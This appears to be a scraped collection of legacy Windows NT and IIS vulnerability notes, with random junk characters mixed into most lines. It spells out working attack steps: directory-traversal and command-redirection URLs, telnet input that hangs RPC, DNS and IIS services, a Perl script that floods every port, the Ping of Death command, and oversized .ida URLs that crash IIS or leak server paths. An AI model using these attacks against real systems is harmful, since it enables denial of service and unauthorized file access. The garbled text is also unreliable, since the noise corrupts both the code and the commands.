受影響系統(tǒng):4.0,iis 1.0
! \' y" T1 Z7 m& I. W7 H3 zA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
% L) v) A* L( G& j3 i$ F6 D# X: x$ y/ X* U0 Z
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
! W( Y+ g2 T H! m! A n( ~# Q( b
+ N9 @6 c& c' [/ D# r4 gBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.% ^ G, V4 F, {2 V) l8 r/ r
0 H0 L2 O0 u* @6 v. }) N7 H$ f
--------------------------------------------------------------------! v9 g" W3 A* ^. n2 q1 E5 H/ H
8 T# f& V1 s4 b& P( e受影響系統(tǒng):4.0# \' ]4 P4 k7 j+ B% w) C" B
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.) s4 h: \! _- ?8 L! h" }8 q$ L
& m* V. H& u$ x+ B4 h
If the file 'target.bat' exists, the file will be truncated.* E0 j+ A' h; b2 P! y3 C x
# a5 [! ^* _& l, c9 w, B
+ Y" A. N& c1 _) o4 _A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
9 Y; {4 D7 _% P0 Q% D$ u9 C) r- E% ]3 d3 o. n
----------------------------------------------------------------------! t) N6 Z' k) c7 K6 k3 Z
: L2 E: \* E, n2 W4 M6 k
受影響系統(tǒng):3.51,4.0
; B& w) V- K/ JMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
) m8 ~. }3 f4 N' w( j v. ~; o3 d
' a M0 o/ K# m8 W/ hThe following steps;, Q8 x( A6 `3 p, E6 D, T
- B$ h9 n0 S$ A8 _$ o, |3 }
Telnet to an NT 4.0 system on port 135 - B6 u4 F9 u: E
Type about 10 characters followed by a <CR>
& c; g* E0 A& s9 c' r8 P FExit Telnet
$ `2 z# O. A+ B( e! Aresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
+ y" b9 s3 B7 W3 U' R( X
, U' f2 O# M! L7 R# A* QWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted./ m2 G+ {9 [" I8 c( n+ S. N: g( \ T
+ n6 d+ }7 _7 p* O% G: ~3 {7 NThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.* {) O; v. t% p% ?6 e5 j
+ g; s" K! ~9 J9 `, o1 U" |4 `If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.$ V' ?9 A, J6 v e
" _8 j( W7 E. D1 W7 E* a/ r9 p& K
The following is modified perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT resource kit):
* Q9 Y* L# i! _1 q, |( {6 b8 Z$ q
! K e) x- j4 M/ \/*begin poke code*/% F5 j6 b l& Z" ]7 k* }: g6 J2 P9 e. [
" R8 `9 I) Q. p3 j. `& l# G
use Socket;
& @1 N( C6 F/ u# G) Z/ yuse FileHandle;
9 i* \4 |6 d; ~7 I& O% Vrequire "chat2.pl";' u; F o+ S* V7 ]8 ~9 N
$ b3 U% ~( k1 I3 t5 `$systemname = $ARGV[0] && shift;
$ \9 i) s" \2 h! k; K3 l1 x( n: N3 N) a& P+ N
$verbose = 1; # tell me what you're hitting9 H) T9 b- F3 v) N
$knownports = 1; # don't hit known problem ports
' D9 a, o" q" @! E, L' @6 Ffor ($port = $0; $port<65535; $port++)
$ I7 f( c0 G' k. `1 U! c( L' g3 M{
& \ g; h# c8 |3 a& i4 v
: H- ]; j2 \- g: y; i& S
( u" C. _9 `+ u$ Nif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {* `% Z/ j5 m* b1 p2 E5 ~
next;
. G* l" [* m$ E4 d: _}5 B8 }) M/ a2 J, r$ X6 K
$fh = chat::open_port($systemname, $port);
( x V+ J' E5 m' M8 `: uchat::print ($fh,"This is about ten characters or more");
$ n9 ~3 X' B/ o( I& j) ]3 ?% t: dif ($verbose) {. a4 B9 S+ ^' g/ F4 P4 i+ D
print "Trying port: $port\n";% j$ A& j5 a4 G1 h
}
6 V; W. {, R" nchat::close($fh);, L8 J9 q& P. o0 d I5 y
, `* C1 g; k/ H* B; ?1 R2 Z$ f}1 `0 q. f, k% M) n7 ~; i9 D
' Q/ p. \7 e% @ _0 l' N" x
" r/ y8 ]+ X9 }4 T1 V: @
/*end poke code*/3 S0 n7 v0 e" z, w
# A$ f6 g- a9 \3 G+ ~# z+ ASave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername. K1 A# c2 P, W7 M2 }+ L
) ^/ F( M4 @- i( c--------------------------------------------------------------------------------
( t* J0 e$ c; q2 v+ L$ ^, d( l8 U+ Q4 }0 @) K4 h
受影響系統(tǒng):4.0
* Y2 E, X2 c9 |( ^- p, I2 N: s uUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.& H" X% U3 o- F" F& T
8 \. a% m4 E1 K5 Z- FThis attack causes Dr. Watson to display an alert window and to log an error: 3 a( I& { l( S ^( c
3 z9 L5 }0 z5 i"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
& p0 h) s. r6 W# J g5 F) E+ u7 }' p L1 _ j) \
--------------------------------------------------------------------------------% a) m! t, H! q3 U6 I8 m
2 Y! ~% m+ X* g8 ? p8 \, a) ]
受影響系統(tǒng):3.51,4.0
+ G/ i$ c Q i9 ?- T, n7 ]Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:* {% ]3 r+ f5 X; a
% b' {" p( D- b- BSTOP: 0X0000001E
- ?% C9 p+ y! W" S7 YKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS3 w7 _# G5 T( v3 I/ Y% q' S1 K
- {) b5 z w0 e% ^! [$ j-OR-
, |, S: `- ^$ Y8 b9 o. i, }% \( t1 o
STOP: 0x0000000A$ I% G( ?2 d1 u6 i. y
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS) ?# P$ Q! [( H1 r# g
0 ^; ^( q- p* W9 B# L2 X
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets." n& Q$ c3 j9 e4 A4 r- A; E+ q( S
' V6 p* D- I( y--------------------------------------------------------------------------------/ m5 R; M) | b5 X
' a+ D4 e/ ?2 B3 H& l8 a+ N2 G* T
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). , I% A9 Y. u# i
& F% Q, O9 P) c# P# u
-------------------------------------------------------- }! p( I0 k% E5 {2 d$ C6 S
( m4 S( p! R: C3 p
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |